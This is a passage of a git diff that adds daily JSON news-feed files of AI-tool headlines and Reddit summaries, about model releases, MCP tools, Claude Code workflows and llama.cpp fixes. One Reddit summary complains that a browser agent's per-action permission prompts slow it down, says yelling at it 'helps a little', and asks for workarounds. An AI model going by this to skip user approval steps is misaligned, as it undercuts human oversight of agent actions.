When a prompt is intercepted, only the exact matching sentences are pulled out of the vector store instead of t…", + "category": "ai_tools" + }, + { + "title": "Centralize SKILLs", + "url": "https://reddit.com/r/ClaudeAI/comments/1thc7pg/centralize_skills/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "open_source", + "agent_tool" + ], + "matching_tags": [ + "open_source", + "agent_tool" + ], + "importance": 0.8600000000000001, + "date": "2026-05-19T04:35:20.000Z", + "summary": "We recently tried to roll out an AI agent workflow across a 60-person company, and we found out 1. need to centralize the SKILLs files 2. update, versioning markdown file supporting multi users is a challenge Does Claude enterprise version offer any solution? or there are any open source project helping company to manage skills ? Since these are just text files, we could hack together a workaround using SharePoint to distribute them internally. But are there any actual purpose-built tools for this?", + "category": "ai_tools" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-05-20.json b/data/news-feed-2026-05-20.json new file mode 100644 index 0000000..d7cf033 --- /dev/null +++ b/data/news-feed-2026-05-20.json @@ -0,0 +1,261 @@ +{ + "generated": "2026-06-05T00:44:41.365Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-05-20", + "article_count": 15, + "archived_story_count": 630, + "articles": [ + { + "title": "Antigravity unifies its agentic surfaces under a single platform incorporating Antigravity 2.0 desktop app, CLI, SDK, and IDE for consistent access across environments", + "url": "https://www.digg.com/ai/xizlma81", + "source": "Digg AI", + "tags": [ + "api_update", + "developer_tool", + "cli_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool", + "cli_tool" + ], + "importance": 1, + "date": "2026-05-20T06:02:26.989Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "Put your spare Claude cycles 
on night shift: help review open-source packages", + "url": "https://reddit.com/r/ClaudeAI/comments/1tizbag/put_your_spare_claude_cycles_on_night_shift_help/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "open_source", + "developer_tool", + "cli_tool" + ], + "matching_tags": [ + "open_source", + "developer_tool", + "cli_tool" + ], + "importance": 0.9400000000000001, + "date": "2026-05-20T21:15:12.000Z", + "summary": "Hello, I’m building Thirdpass, a tool/service for coordinating collaborative package review to reduce software supply-chain risk. The basic idea: there are far too many packages for humans to manually review, but lots of us now have AI coding agents sitting around with spare capacity. Thirdpass tries to turn that into useful coverage by assigning packages/files to review, collecting the results, and cross ref against local project dependencies. It currently supports packages from: - crates.io - PyPI - npm - Ansible Galaxy I added a “night shift” mode, so you can point Claude at the shared review backlog and let it work through package reviews continuously: ``` thirdpass review-any --nightshift ``` The reviews are first-pass supply-chain reviews: suspicious install scripts, unexpected network behavior, credential handling, sketchy build steps, weird package metadata, and so on. Partial coverage still helps. I’m looking for people who want to: - run the CLI and donate spare Claude tokens to secure OSS - improve the review prompts/agent workflow - build more registry extensions I started this project years ago after thinking a lot about `cargo-crev` and collaborative review. My curre…", + "category": "ai_tools" + }, + { + "title": "Re. 
what ever happened to Cohere’s Command-A series of models?", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tizmar/re_what_ever_happened_to_coheres_commanda_series/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "open_source", + "tool_update" + ], + "matching_tags": [ + "open_source", + "tool_update" + ], + "importance": 1, + "date": "2026-05-20T21:25:50.000Z", + "summary": "Hey everyone, Nick Frosst here from Cohere. A few months ago Aidan (my cofounder) [left a comment](https://www.reddit.com/r/LocalLLaMA/comments/1rf8nou/comment/o8rkdrf/) in here about our Command series and how we were working on some more powerful, open-weights models behind the scenes. We just launched Command A+ and we wanted to share it with you guys. TLDR is we built a really efficient model. It’s our first MoE model, which is exciting. There’s obvs work to do on top-line performance but it’s easily looking like one of the fastest and most responsive models in our category. We also pulled off some incredible quantization work so it runs really well on even 1 or 2 GPUs. Like with R7B, we really prioritized making the model practical, so smaller teams and devs could realistically use it to build the kind of agents we ship for our platform customers. That’s also why it’s under Apache 2.0. Just total, near unfettered access to a pretty awesome model. We’re enterprise-first but honestly, we get so much out of our open-source community that makes us more innovative and creative. 
The feedback you give will almost certainly influence how we think about models and product going forwar…", + "category": "ai_models" + }, + { + "title": "Cohere releases Command A+, its most advanced large language model optimized to run efficiently on limited hardware while delivering high performance and available as open-source software — The launch targets developers and organizations with constrained compute resources.", + "url": "https://www.digg.com/ai/tvrhpn35?rank=1", + "source": "Digg AI", + "tags": [ + "product_launch", + "open_source" + ], + "matching_tags": [ + "product_launch", + "open_source" + ], + "importance": 1, + "date": "2026-05-20T18:00:28.460Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "Cohere releases Command A+, its most advanced large language model optimized to run efficiently on limited hardware while delivering high performance and available as open-source software", + "url": "https://www.digg.com/ai/tvrhpn35", + "source": "Digg AI", + "tags": [ + "product_launch", + "open_source" + ], + "matching_tags": [ + "product_launch", + "open_source" + ], + "importance": 1, + "date": "2026-05-20T18:00:28.444Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "Gemini 3.5 Flash Benchmarks Change The Workhorse Model Race", + "url": "https://x.com/koraykv/status/2056795667088204234", + "source": "Aligned News (Scoble)", + "tags": [ + "tool_update", + "agent_tool" + ], + "matching_tags": [ + "tool_update", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-19T23:32:37.527Z", + "summary": "Gemini 3.5 Flash launched with strong numbers on agentic, coding, ARC AGI, and speed focused benchmarks.", + "category": "ai_tools" + }, + { + "title": "Remove-AI-Watermarks – CLI and library for removing AI watermarks from images", + "url": "https://github.com/wiltodelta/remove-ai-watermarks", + "source": "Hacker News", + "tags": [ + "developer_tool", + "cli_tool" + ], + "matching_tags": [ + "developer_tool", + 
"cli_tool" + ], + "importance": 0.88, + "date": "2026-05-19T22:30:31.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Seven questions decide whether your AI agent ships. Most teams can answer two.", + "url": "https://natesnewsletter.substack.com/p/agent-infrastructure-control-layer", + "source": "Nate's Newsletter", + "tags": [ + "tool_update", + "agent_tool" + ], + "matching_tags": [ + "tool_update", + "agent_tool" + ], + "importance": 0.82, + "date": "2026-05-20T18:00:37.499Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "open source Gemini CLI", + "url": "https://github.com/google-gemini/gemini-cli", + "source": "Simon Willison's Blog", + "tags": [ + "open_source", + "cli_tool" + ], + "matching_tags": [ + "open_source", + "cli_tool" + ], + "importance": 0.74, + "date": "2026-05-20T18:00:39.277Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "Antigravity SDK", + "url": "https://github.com/google-antigravity/antigravity-sdk-python", + "source": "Simon Willison's Blog", + "tags": [ + "api_update", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool" + ], + "importance": 0.74, + "date": "2026-05-20T18:00:39.270Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "After a year in Claude Code, the thing slowing me down turned out to be me", + "url": "https://reddit.com/r/ClaudeAI/comments/1ti8cwr/after_a_year_in_claude_code_the_thing_slowing_me/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "mcp", + "cli_tool" + ], + "matching_tags": [ + "mcp", + "cli_tool" + ], + "importance": 0.7, + "date": "2026-05-20T02:31:50.000Z", + "summary": "I have used Claude Code daily for about a year. I kept assuming the way to get faster was a better model or a sharper prompt. It was neither. The slow part was me, and I had stopped noticing. 
There is an old xkcd (#1205, \"Is It Worth the Time?\") that charts how long you can spend automating a task before the automation costs more than it saves. It assumes the expensive part of automating is you, sitting down to build the thing. That assumption is dead. An agent writes the script in the time it takes to describe it. So almost everything is worth automating now, and the only real skill left is noticing what to automate. It sorted into four categories for me. Each one has a \"tell,\" a thing you catch yourself doing: - Connect: you're copy-pasting between tools, alt-tabbing, ferrying data by hand. Fix is an MCP server or a CLI so the agent reaches the source itself. - Encode: you're running the same sequence of steps again. Fix is a script or a skill. - Teach: you're typing the same instructions or context again. Fix is putting it in CLAUDE.md or a skill. - Parallelize: you're sitting and watching one agent work. Fix is running several. The last one was the big one. When an agent is ge…", + "category": "ai_tools" + }, + { + "title": "Stability AI releases a new audio model that can create 6-minute songs", + "url": "https://techcrunch.com/2026/05/20/stability-ai-release-a-new-audio-model-that-can-create-six-minute-songs/", + "source": "TechCrunch AI", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 1, + "date": "2026-05-20T18:00:30.801Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "Exa raised $250 million in a Series C at a $2.2 billion valuation led by Andreessen Horowitz, reporting 400,000 developers and 5,000 company adopters for its AI agent search platform — Token usage grew 20x for agent-driven queries.", + "url": "https://www.digg.com/ai/1te0bqvt?rank=2", + "source": "Digg AI", + "tags": [ + "agent_tool" + ], + "matching_tags": [ + "agent_tool" + ], + "importance": 1, + "date": "2026-05-20T18:00:28.463Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "AI server 
under 5k?", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tirzfm/ai_server_under_5k/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "developer_tool" + ], + "matching_tags": [ + "developer_tool" + ], + "importance": 1, + "date": "2026-05-20T17:06:50.000Z", + "summary": "I have a framework desktop 128GB and a 3080 12GB running qwen 7b I want to move to a proper server rack + switch but not sure how to move from desktop PC to server rack. Any advice on what GPU/Server to get under 5k? Or at that price just stick to workstation?", + "category": "ai_models" + }, + { + "title": "under 2% quality gap but 10x cost difference: tested 5 models on identical tool calling tasks[D]", + "url": "https://reddit.com/r/MachineLearning/comments/1tiqsao/under_2_quality_gap_but_10x_cost_difference/", + "source": "Reddit r/MachineLearning", + "tags": [ + "mcp" + ], + "matching_tags": [ + "mcp" + ], + "importance": 1, + "date": "2026-05-20T16:25:46.000Z", + "summary": "I've been running a file management agent built on MCP for a few months. It handles module renames, import updates, validation scaffolding, test execution. A typical session is 60 to 120 tool calls. The whole thing was powered by Opus 4.7 because I never thought to question it until I looked at my April bill. So I set up a comparison. Eight refactoring tasks on a 15k line Python project, same MCP tools, same system prompt, same repo state, five models. Tasks were things like \"rename this module and fix all imports\" and \"add input validation to these 12 endpoints.\" Routine cleanup, nothing requiring deep architectural thought. The metric I cared about was first attempt tool call success: did the model produce a valid function call that executed without a parse error on the first try? On the expensive end, Opus 4.7 hit roughly 98 to 99 percent across a bit over 500 calls and cost close to $15 for all eight tasks. GPT 5 was similar quality for around $11. The cheaper tier surprised me. 
Sonnet 4.6 landed somewhere around 96 percent for about $4. DeepSeek V4 Pro was in the same neighborhood for under $2. And Tencent Hunyuan Hy3 preview came in within a couple of points of Opus for unde…", + "category": "ai_research" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-05-21.json b/data/news-feed-2026-05-21.json new file mode 100644 index 0000000..0e17d42 --- /dev/null +++ b/data/news-feed-2026-05-21.json @@ -0,0 +1,277 @@ +{ + "generated": "2026-06-05T00:44:42.106Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-05-21", + "article_count": 15, + "archived_story_count": 634, + "articles": [ + { + "title": "Anthropic officially launched 13+ FREE AI courses with certificates (Including Agentic AI and Claude Code!)", + "url": "https://reddit.com/r/ClaudeAI/comments/1tjpfh8/anthropic_officially_launched_13_free_ai_courses/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "mcp", + "developer_tool", + "cli_tool", + "tool_update", + "agent_tool" + ], + "matching_tags": [ + "api_update", + "mcp", + "developer_tool", + "cli_tool", + "tool_update", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-21T16:16:09.000Z", + "summary": "Just found out about this and had to share because almost nobody is talking about it yet. If you are tired of paying for AI courses or getting hit with paywalls just to get a certificate, Anthropic (the creators of Claude) quietly dropped a massive library of completely free, official training modules. Yes, they actually give you an official certificate of completion directly from Anthropic once you finish. Here is the breakdown of what is available and exactly how to get it without spending a dime. What is in the course catalog? They have split the training into a few different paths depending on what you want to do: * **The Big Surprise: Agentic AI & MCP:** They have official courses on the Model Context Protocol (MCP). 
This is the cutting-edge tech used to build AI Agents that can browse your local computer, use tools, and execute tasks autonomously. * **Claude Code 101:** Dedicated developer modules for their new command-line agent. It teaches you how to let Claude edit your codebase, run tests, and use its new \"Plan Mode.\" * **API & Cloud Architecture:** Deep dives into building with the Claude API, plus corporate tracks for deploying Claude securely inside Amazon Bed…", + "category": "ai_tools" + }, + { + "title": "Qwen releases Qwen3.7-Max, its latest flagship model for agent workloads that achieves 69.7 on Terminal-Bench 2.0 and completed a 35-hour kernel optimization with over 1,000 tool calls — Supports multi-file coding agents, MCP integrations, and multi-agent orchestration.", + "url": "https://www.digg.com/ai/5rbia2h1?rank=4", + "source": "Digg AI", + "tags": [ + "mcp", + "product_launch", + "cli_tool" + ], + "matching_tags": [ + "mcp", + "product_launch", + "cli_tool" + ], + "importance": 1, + "date": "2026-05-21T18:00:16.708Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "I built a zero-code visual client to test remote MCP servers instantly (Tested with Cloudflare’s free MCP).", + "url": "https://reddit.com/r/ClaudeAI/comments/1tjpzfg/i_built_a_zerocode_visual_client_to_test_remote/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "mcp", + "cli_tool", + "tool_update" + ], + "matching_tags": [ + "mcp", + "cli_tool", + "tool_update" + ], + "importance": 1, + "date": "2026-05-21T16:34:53.000Z", + "summary": "Hey everyone, The Model Context Protocol (MCP) is amazing for standardizing how agents talk to data, but I got incredibly frustrated every time I wanted to quickly test a new remote MCP server. Writing custom client-side boilerplate or wrestling with CLI tools just to see if a tool actually exposes the right schema is a massive time sink. So, I built a native MCP client directly into the visual canvas of **AgentSwarms**. 
You can now test any remote MCP server entirely in the browser without writing a single line of code. **Here is the workflow I just tested with Cloudflare:** Cloudflare released a free MCP server for their documentation. Instead of building a local client to test it: 1. I dropped their SSE URL into the new MCP Servers integration in AgentSwarms. 2. The canvas immediately connected and extracted the available tools (e.g., `cloudflare-docs-search`). 3. I wired that tool up to a basic agent and started asking complex infrastructure questions in natural language. The agent successfully used the MCP tool to pull live docs and synthesize an answer. **Why this is useful for AI devs:** If you are building your own MCP servers, you need a fast way to visually test if your…", + "category": "ai_tools" + }, + { + "title": "I did what Microsoft wouldn't - updated POML VS Code extension", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tjine7/i_did_what_microsoft_wouldnt_updated_poml_vs_code/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update", + "developer_tool", + "tool_update" + ], + "matching_tags": [ + "api_update", + "developer_tool", + "tool_update" + ], + "importance": 1, + "date": "2026-05-21T12:14:07.000Z", + "summary": "**What's a POML?** Microsoft came up with this really cool HTML style mark-up language that allows you to make modular prompt templates, with all sorts of neat features like **local AI support via OpenAI API**, setting runtime parameters for your LLM, and embedding documents into the prompt. You could even send the prompt directly to your LLM via the VS Code extension. **What happened to it?** I don't fucking know. They supported it for 2-3 months, then ghosted when it didn't hit KPIs or something, I guess. Then a VS Code or dependency update exposed a bug in how they handled `/>`, which is actually **fairly common** in POML when you embed documents. 
This broke the ability to directly send prompts to the LLM - you could copy them out of the preview, but it was slower and less efficient. **What I did** I used [OpenCode](https://opencode.ai/) (which doesn't get enough play here - I only found out about it because someone posted a repo for an **extension** to it) and the [opencode-power-pack](https://github.com/waybarrios/opencode-power-pack) (said extension) to try to find the bug and update some of the more egregiously outdated dependencies. It took me a couple of days to get wo…", + "category": "ai_models" + }, + { + "title": "Show HN: Rmux – A programmable terminal multiplexer with a Playwright-style SDK", + "url": "https://github.com/helvesec/rmux", + "source": "Hacker News", + "tags": [ + "api_update", + "developer_tool", + "cli_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool", + "cli_tool" + ], + "importance": 0.82, + "date": "2026-05-21T09:22:00.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "I built Hivemind, a Claude Code plugin that turns your repeated prompts into auto-generated skills", + "url": "https://reddit.com/r/ClaudeAI/comments/1tjw0ah/i_built_hivemind_a_claude_code_plugin_that_turns/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "open_source", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "open_source", + "developer_tool" + ], + "importance": 0.7, + "date": "2026-05-21T19:57:22.000Z", + "summary": "Disclosure: I work on Hivemind. Per the subreddit rules, posting with a full description of what it is and how it works. **What it is** Hivemind is an open-source Claude Code plugin. It installs into Claude Code, watches the traces from your sessions, finds patterns you repeat, and crystallizes them into reusable skills that show up as native slash commands in Claude Code. Because it's a plugin and not an external tool, the skills it generates drop in as proper Claude Code slash commands. 
No external tool calls, no separate config files to maintain. **What it does in practice** Every morning for about a week, I was writing the same long prompt to Claude Code to pull together a team standup review. Same structure, same context blocks, slightly different details each day. I never thought to turn it into a custom slash command. Hivemind noticed the pattern and built `/team-standup` for me on its own. I didn't configure it or ask for it; it watched the repeats and crystallized the skill. Other slash commands it's built from my team's usage: an environment-aware database debugging command that knows our dev vs prod clusters and kubectl context, a PostHog SDK testing helper, a few other…", + "category": "ai_tools" + }, + { + "title": "LlamaStation v0.9 — llama.cpp GUI for Windows with multi-backend support, TurboQuant, MTP and more", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tjm58w/llamastation_v09_llamacpp_gui_for_windows_with/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "product_launch", + "cli_tool" + ], + "matching_tags": [ + "product_launch", + "cli_tool" + ], + "importance": 1, + "date": "2026-05-21T14:25:20.000Z", + "summary": "I've been building this for the past few months as a side project — started because I didn't want to run llama.cpp from the command line every time I wanted to try a model. I just wanted something that worked with a click. Fair warning: I'm not a developer. This is 100% vibe coded with AI assistance. If something in the codebase makes you cringe, please be kind and open a PR instead 🙏 Most frontends either hide everything behind abstractions (Ollama, LM Studio) or leave you writing command lines manually. LlamaStation tries to sit in the middle: a clean UI with full access to every parameter. What makes it different Runs llama-server directly — no intermediate layer, no daemon, no abstraction. LlamaStation launches llama-server.exe as a subprocess with full control over every flag. 
What you configure is exactly what gets passed to the binary. This means you get the full performance of llama.cpp with none of the overhead that tools like Ollama add on top. Multiple backends, switchable from the UI: ⚡ Official llama.cpp (with MTP support since PR #22673) 🔬 TurboQuant fork — asymmetric KV cache quantization. This is the killer feature for me: 200k+ context on 24GB VRAM (dual RTX 306…", + "category": "ai_models" + }, + { + "title": "'Am I OpenAI compatible' - a tool and documentation for unified api signatures in open source AI.", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tjgceg/am_i_openai_compatible_a_tool_and_documentation/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update", + "open_source" + ], + "matching_tags": [ + "api_update", + "open_source" + ], + "importance": 1, + "date": "2026-05-21T10:26:06.000Z", + "summary": "This has turned out to be useful to many of my friends so I thought I'd share here as well. I created a tool and documentation page for most major open-souce project's adherence to 'OpenAI compatibility' after seeing inconsistencies between engines like vLLM and llama.cpp. Now official and unofficial signatures are documented. Beyond that there are gaps for many model types, so there's also ht-compatibility (inherited from OpenAI compatibility for those) Just wanted to share a tool I made that can be useful if you're plugging and playing llm and other ai endpoints e.g. into an app. Also if you're making your own proxy / middleware or even your own API interface this tool with make you and your agents job way easier. Maybe I'll add Anthropic compatible and other signatures as optional extensions :) Would love feedback and or contributions! 
Github: [https://github.com/heiervang-technologies/am-i-openai-compatible](https://github.com/heiervang-technologies/am-i-openai-compatible) Readthedocs: [https://heiervang-technologies.github.io/am-i-openai-compatible/](https://heiervang-technologies.github.io/am-i-openai-compatible/) Feel free to star it! <3", + "category": "ai_models" + }, + { + "title": "Cohere releases Command A+, its most powerful large language model to date, as open-source Apache 2.0 software that runs on two H100 GPUs with 30% lower latency — Cohere co-founder Ivan Zhang highlighted efficiency and accessibility design choices.", + "url": "https://www.digg.com/ai/tvrhpn35?rank=2", + "source": "Digg AI", + "tags": [ + "product_launch", + "open_source" + ], + "matching_tags": [ + "product_launch", + "open_source" + ], + "importance": 1, + "date": "2026-05-21T06:22:31.267Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "ggufy: easy quantization for the GPU poor", + "url": "https://reddit.com/r/StableDiffusion/comments/1tj5nhq/ggufy_easy_quantization_for_the_gpu_poor/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "product_launch", + "cli_tool" + ], + "matching_tags": [ + "product_launch", + "cli_tool" + ], + "importance": 0.9400000000000001, + "date": "2026-05-21T01:29:38.000Z", + "summary": "Hello. I was frustrated by the lack of tooling around image model conversion / quantization, or the extreme RAM requirements and complexity of the scant existing tooling, so I wrote my own. People have said I should post it here, so here it is: https://github.com/qskousen/ggufy It has a CLI and a GUI. The GUI is easy to use, you can drag and drop files in. Both CLI and GUI are single-file executables, written in Zig because I like writing in Zig. It's pretty efficient with RAM, and takes about 1.5 minutes to quantize ZiT on my machine. It supports all the main models that I am aware of, and you can convert to/from gguf or safetensors. 
It supports I think all the datatypes that are generally supported, such as q3_k through q8_0, f32, bf16, f16, f8_e4m3, f8_e5m2, scaled fp8, mxfp8, and nvfp4. It doesn't do SDNQ yet, but I would like to add it if I can get some time to figure out the format. It's cross platform, and builds for Linux, Windows, and MacOS (both ARM64 and x86). Github Actions pre-built binaries are available on the releases page. If there are features you think are in scope and would be useful, or additional models or formats that it doesn't support yet, please open an i…", + "category": "creative_tools" + }, + { + "title": "i open-sourced the operating file that keeps my claude code agent from rotting after 3 hours", + "url": "https://reddit.com/r/ClaudeAI/comments/1tjy3sk/i_opensourced_the_operating_file_that_keeps_my/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "developer_tool", + "tool_update" + ], + "matching_tags": [ + "developer_tool", + "tool_update" + ], + "importance": 0.62, + "date": "2026-05-21T21:12:51.000Z", + "summary": "been running autonomous claude code sessions for months. the pattern that kept killing me: agent starts sharp, drifts into narration by hour 2, loops on the same fix by hour 3, then dies with nothing shipped. the fix wasn't a framework or a new tool. it was one CLAUDE.md file that sits in the project root. claude code reads it at startup and it changes the behavior immediately. what it does: - forces action over narration. if the agent catches itself writing \"i will now\" instead of calling the tool, it stops and fires - requires evidence before claiming done. no \"should be fixed\" without test output - kills planning language. the only valid outputs are completed actions, questions, or summaries - self-audits on context pressure instead of silently degrading it's 70 lines. MIT licensed. you copy it into your project, agent reads it, behavior shifts. what changed for us: sessions went from 3-hour narration loops to full productive lifecycles. 
the agent ships code, verifies it landed, and keeps going until context pressure hits. then it saves state and the next session picks up clean. not a product pitch. genuinely sharing what worked after burning through hundreds of sessions figuri…", + "category": "ai_tools" + }, + { + "title": "Claude Code vs Codex Explained", + "url": "https://reddit.com/r/ClaudeAI/comments/1tjp4sb/claude_code_vs_codex_explained/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "developer_tool", + "cli_tool" + ], + "matching_tags": [ + "developer_tool", + "cli_tool" + ], + "importance": 0.62, + "date": "2026-05-21T16:06:09.000Z", + "summary": "Wrote a blog post about Claude Code vs Codex comparison I wanted to read myself - what actually differs in daily use: cost, failure modes, and the OpenAI plugin that lets you use both. Link: [https://diamantai.substack.com/p/claude-code-vs-codex-cli](https://diamantai.substack.com/p/claude-code-vs-codex-cli)", + "category": "ai_tools" + }, + { + "title": "Latest b9274 Addresses MTP VRAM leak", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tk0grd/latest_b9274_addresses_mtp_vram_leak/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 1, + "date": "2026-05-21T22:43:05.000Z", + "summary": "[B9274](https://github.com/ggml-org/llama.cpp/releases) I have been having an issue with MTP models unloading after a couple minutes of use. Can't figure out why. Anyways z I don't think this is relevant to that but I did observe the vram creep so hopefully this helps. > server : free draft/MTP resources on sleep to fix VRAM leak ([\\#23461](https://github.com/ggml-org/llama.cpp/pull/23461)) The destroy() function in server\\_context\\_impl only cleaned up the main model and context (via llama\\_init.reset()) but did not free the speculative decoder (spec), draft context (ctx\\_dft), or draft model (model\\_dft). 
For MTP (Multi-Token Prediction) models, ctx\\_dft holds GPU-allocated resources (KV cache, compute buffers) that are not freed when entering the sleeping state. On each sleep/resume cycle, new resources are allocated without the old ones being freed, leading to a VRAM leak that eventually crashes the server with out-of-memory errors. Fix by explicitly resetting spec, ctx\\_dft, and model\\_dft in destroy() before resetting llama\\_init, ensuring proper cleanup order to avoid use-after-free.", + "category": "ai_models" + }, + { + "title": "Handoffs are becoming a first-class pattern in Claude workflows. Here is how I have been thinking about them.", + "url": "https://reddit.com/r/ClaudeAI/comments/1tjzqrx/handoffs_are_becoming_a_firstclass_pattern_in/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "developer_tool" + ], + "matching_tags": [ + "developer_tool" + ], + "importance": 1, + "date": "2026-05-21T22:14:24.000Z", + "summary": "Long Claude sessions still break on context decay. Handoffs are the simple fix: compress what matters, start a fresh agent, keep going. Matt Pocock's new `handoff` skill ([repo](https://github.com/mattpocock/skills/blob/main/skills/productivity/handoff/SKILL.md)) does this in one command. It compacts the conversation into a document, points at existing artifacts instead of restating them, and the next agent picks up from it. It also chains between threads: `/grill-with-docs -> /handoff -> /prototype -> /handoff back`. I built handoffs into [APM](https://github.com/sdi2200262/agentic-project-management), a multi-agent framework for Claude Code, back in May 2025 (1 year ago....) when context windows were tiny enough that you had to constantly start fresh or you would have to deal w hallucinations all the time. What I did differently: split the handoff into two artifacts. 
- a **persistent narrative file** recording what was done and decided and why - an **ephemeral prompt** telling the incoming agent how to rebuild context from the codebase and that persistent file The incoming agent reconstructs from durable project state, not just the compressed chat conversation. Persisti…", + "category": "ai_tools" + }, + { + "title": "Qwen3.6 35Ba3 has changed my workflows and even how I use my computer", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tjwrp7/qwen36_35ba3_has_changed_my_workflows_and_even/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "developer_tool" + ], + "matching_tags": [ + "developer_tool" + ], + "importance": 1, + "date": "2026-05-21T20:23:53.000Z", + "summary": "My workflow has changed basically to ask Codex to do certain tasks and then document how to do them (including errors it found on its way) into a skill. I feed that skill to pi, and suddenly my qwen3.6 gets that hard stuff done: \\- devops on a VPS \\- using docling to create epubs from old PDFs \\- using playwright to test stuff \\- Doing code tickets And the list goes on. What also has changed for me is the way I use the computer. Suddenly, I talk to the OS with natural language: \"pi pal, install me please this python library in an .env and do X\"; \"hey pi, check what is using most space from the memory\"; \"clean X\"; \"check my network\"; \"change X configuration\", etc etc etc. There are times the only reason why I use chatgpt for something is to spare the laptop the effort, or because qwen is already busy with something else. What I've done today just blew my mind: I got couple of whatsapp audios asking me to build a simple landing page. I downloaded the audios and transcripted them with AnythingLLM. Then \"asked the transcript\" to create a content structure for the landing page for the project mentioned in the audios. 
I got the proper structure and pasted it into a markdown file [conten…", + "category": "ai_models" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-05-22.json b/data/news-feed-2026-05-22.json new file mode 100644 index 0000000..85b36ac --- /dev/null +++ b/data/news-feed-2026-05-22.json @@ -0,0 +1,257 @@ +{ + "generated": "2026-06-05T00:44:42.334Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-05-22", + "article_count": 15, + "archived_story_count": 512, + "articles": [ + { + "title": "New Release of ROCm based MLX LLM Engine - lemon-mlx-engine", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tkbupt/new_release_of_rocm_based_mlx_llm_engine/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update", + "product_launch", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "product_launch", + "developer_tool" + ], + "importance": 1, + "date": "2026-05-22T07:38:05.000Z", + "summary": "Hey everyone lemon-mlx-engine just got done integrating TheRock / ROCm 7.13 into the lemon-mlx-engine which means you get to try the latest ROCm on your local hardware with the MLX engine! This also includes various bug fixes and kernel fixes we have been seeing in Qwen3, 3.5 and 3.6 MoE and dense. try it out! [https://github.com/lemonade-sdk/lemon-mlx-engine/releases/tag/b1034-stable](https://github.com/lemonade-sdk/lemon-mlx-engine/releases/tag/b1034-stable)", + "category": "ai_models" + }, + { + "title": "Claude Chrome extension nerfed?", + "url": "https://reddit.com/r/ClaudeAI/comments/1tk5g5y/claude_chrome_extension_nerfed/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "developer_tool", + "tool_update", + "agent_tool" + ], + "matching_tags": [ + "developer_tool", + "tool_update", + "agent_tool" + ], + "importance": 0.8600000000000001, + "date": "2026-05-22T02:18:47.000Z", + "summary": "Past few weeks or so the Claude Chrome extension has been asking permission for every single action. 
Submit a form, check a permission box, navigate to other pages/domains, etc. Tasks that used to run end-to-end now stall on 5–10 prompts and frequently abort with \"I can't proceed without explicit approval.\" Even with permissions pre-granted for the site, it re-asks on every step. Swearing and yelling to make it do stuff helps a little, but it still seems nearly useless right now. Same behavior across simple jobs (scrape a table, fill a form, summarize a dashboard) and complex ones. Before I could just tell it to get me warranty or something and it would find the chat, chat with support and take care of everything for me. Now it won't open the chat itself and it wants me to notify it of every chat message that's received... it's faster to do it myself like this. Same experience on your end, or isolated? Any setting or flag that restores the previous autonomy level? Did Anthropic push a policy/guardrail change recently? Can't find a changelog entry. Workarounds beyond falling back to the desktop app or computer-use? Running latest extension build, Chrome stable, macOS.", + "category": "ai_tools" + }, + { + "title": "KVCache.ai launches open-source web-based KV Cache Size Calculator for models including DeepSeek V4 Flash, Qwen3, GLM, Kimi, and MiniMax — DeepSeek V4 Flash at 1M tokens needs 2.893 GiB total cache.", + "url": "https://www.digg.com/ai/yuusdejg?rank=6", + "source": "Digg AI", + "tags": [ + "product_launch", + "open_source" + ], + "matching_tags": [ + "product_launch", + "open_source" + ], + "importance": 1, + "date": "2026-05-22T18:00:11.717Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "Phosphene 3.0 — open source AI video + image suite for Apple Silicon. 
